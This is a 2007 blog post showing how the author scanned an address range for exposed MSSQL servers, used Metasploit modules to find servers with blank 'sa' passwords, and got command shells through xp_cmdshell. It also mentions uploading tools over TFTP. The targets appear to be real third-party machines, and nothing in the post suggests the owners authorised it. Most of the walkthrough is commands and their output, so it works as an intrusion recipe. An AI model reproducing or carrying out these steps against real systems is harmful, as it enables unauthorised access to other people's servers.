Sunday, September 9, 2007

old school 0wning MSSQL --fun from the field


rule #1 dont expose your database to the world

rule #2 dont have a null sa account, especially if you are violating rule #1...

let's see...

use unicornscan to search for open TCP port 1433

cg@segfault:~/evil/scanners/$ sudo unicornscan A.B.0.0/16:1433 -p

Open ms-sql-s[ 1433] From A.B.Z.25 ttl 107
Open ms-sql-s[ 1433] From A.B.X.28 ttl 107
Open ms-sql-s[ 1433] From A.B.C.30 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.34 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.50 ttl 106
Open ms-sql-s[ 1433] From A.B.Z.58 ttl 44
Open ms-sql-s[ 1433] From A.B.Z.91 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.141 ttl 109
Open ms-sql-s[ 1433] From A.B.Z.156 ttl 107
Open ms-sql-s[ 1433] From A.B.Y.170 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.184 ttl 108

run those hosts that respond through the msf auxillary module mssql_ping to see if we can get any version information. I'll omit the ones that didnt respond.


cg@segfault:~/evil/msf3$ ./msfconsole

=[ msf v3.1-dev
+ -- --=[ 218 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/mssql/mssql_
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mssql/mssql_ping
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > info

Name: MSSQL Ping Utility
Version: 4419

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for information.

msf auxiliary(mssql_ping) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.X.28:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\\sql\query
[*] Version = 8.00.194
[*] ServerName = JADER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed

msf auxiliary(mssql_ping) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.C.30:
[*] tcp = 1433
[*] np = \\ABC-SERVER\pipe\\sql\query
[*] Version = 8.00.194
[*] ServerName = DTI-SERVER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.Y.170:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\sql\query
[*] Version = 8.00.194
[*] ServerName = SERVIDOR
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed

Now, lets run them thru mssql_login to look for any that have null sa accounts.

msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > info

Name: MSSQL Login Utility
Version: 4749

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1433 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for a null SA account.

msf auxiliary(mssql_login) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_login) > run
[*] Target A.B.X.28 DOES have a null sa account!
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_login) > run
[*] Target A.B.Y.170 does not have a null sa account...
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_login) > run
[*] Target A.B.C.30 DOES have a null sa account!
[*] Auxiliary module execution completed

then lets use sqlcmd to see if we can get a command shell on the box. sqlcmd uses the xp_cmdshell to execute commands.

cg@segfault:~/evil/db$ ./sqlcmd A.B.X.28:1433
connected to host A.B.X.28:1433 as user sa!
exit with CTRL+C

sqlcmd> ipconfig

Configuratio de IP do Windows


Adaptador Ethernet Conexto local:
Estado da media . . . . . . . . . . . : media desconectada

Adaptador Ethernet Conexto de rede sem fio:
Estado da media . . . . . . . . . . . : media desconectada

Adaptador PPP POP:
Sufixo DNS especsfico de conexto. :
Endereo IP . . . . . . . . . . . . : A.B.X.28
Mascara de sub-rede . . . . . . . . : 255.255.255.255
Gateway padro. . . . . . . . . . . : A.B.X.28

OR

cg@segfault:~/evil/db$ ./sqlcmd A.B.C.30:1433
connected to host A.B.C.30:1433 as user sa!
exit with CTRL+C

sqlcmd> ipconfig

Configurato de IP do Windows


Adaptador Ethernet Local:

Sufixo DNS especfico de conexto . :
Endereo IP . . . . . . . . . . . . : 192.168.2.5
Mascara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padro. . . . . . . . . . . :

Adaptador Ethernet remoto:

Sufixo DNS especfico de conexto . :
Endereo IP . . . . . . . . . . . . : 192.168.2.6
Mascara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padro. . . . . . . . . . . : 192.168.2.1

TFTP was available on both boxes for some some old school YR 2000 tftp upload your tools fun.

Links:
MSSQL Version chart: http://www.sqlteam.com/article/sql-server-versions

sqlcmd.c: http://excluded.wgv.at/codedstuff.php

metasploit (like you need the link): http://framework.metasploit.com/

-CG
CG

2 comments:

Anonymous said...

honey pots?

CG said...

perhaps...

this day and age you can probably assume that if you got in with some old school exploit it is probably a honeypot.